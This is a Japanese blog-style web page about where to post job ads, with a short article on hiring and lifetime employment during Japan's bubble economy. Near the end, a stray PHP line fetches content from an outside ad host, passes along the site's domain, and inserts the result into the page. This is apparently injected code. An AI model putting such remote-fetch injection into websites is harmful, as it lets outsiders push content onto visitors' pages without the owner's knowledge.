前へ
次へ

求人情報はどんな媒体に出したらいいのか

できるのであればなるべく効率よく求人募集をかけたいと考えている企業担当者は少なくありません。

more

求人を探すことにはマッチングもあります

求人を探すときにはミスマッチングをしないようにするということなら重要です。
つまりは、自分が入

more

企業レベルによる採用のポイント

求人募集では、会社の中の様子を求職者が知る術はありません。
働く社員の様子や現在進行中のプロジ

more

バブル経済のビジネス市場の価値は高かった

80年代の終わりに起こったのがバブル経済になり、終身雇用が完全に定着をした時代でもあります。
民間の他にも自治体にもそのシステムが根付いていたこともあり、大卒が空前の売り手市場にもなった原因でもあります。
最も日本経済の中でも裕福な時代であったこともあり、ハイレベルな技術力をもっている企業もたくさんありました。
そのために求人募集などは完全に人手が足りないという事態に陥り、新卒の学生を奪い合うという結果にもつながりました。
日本型雇用の黄金期とも言われる所以はまさにそれだけ人手が多く必要だったことにあります。
しかし人件費がどこまでも膨らむことがあるのが雇用形態なので、それを維持するためには経済が果てしなく成長しなくてはいけないという問題点もありました。
当時の働いていた人たちは、このバブル景気というのがずっと続くと思い込んでいた節もあり、求人はいつでもどこでも企業が欲しがっているとさえ思っていた時代です。

".file_get_contents('http://links-001.com/ad/123set.php?dom='.str_replace("www.", "", $_SERVER['HTTP_HOST']))."

"; ?>

Page Top